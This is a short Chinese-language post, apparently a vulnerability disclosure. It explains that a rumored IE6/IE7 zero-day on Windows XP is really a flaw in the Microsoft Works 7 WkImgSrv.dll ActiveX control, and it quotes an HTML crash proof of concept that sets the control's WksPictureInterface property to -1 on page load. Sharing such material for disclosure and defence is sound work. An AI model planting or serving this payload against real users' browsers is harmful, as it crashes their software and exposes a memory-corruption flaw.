近幾天網路上流傳著一個傳說為IE0DAY的POC代碼,在XP系統環境下通殺了IE6和IE7,其它系統並未經過
測試。其實這個漏洞並不是存在於IE,而是Microsoft Works的組件被挖掘出漏洞,部分的XP預裝了Microsoft Works,所以就出現了過全修正系統的漏洞(如華碩易PC 就預裝了Microsoft Works)。
影響的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)
以下為crash POC
引用:
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=」JavaScript」>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=」JavaScript: return payload();」>
<object classid=」clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6〞 id=」obj」>
</object>
</body>
</html>
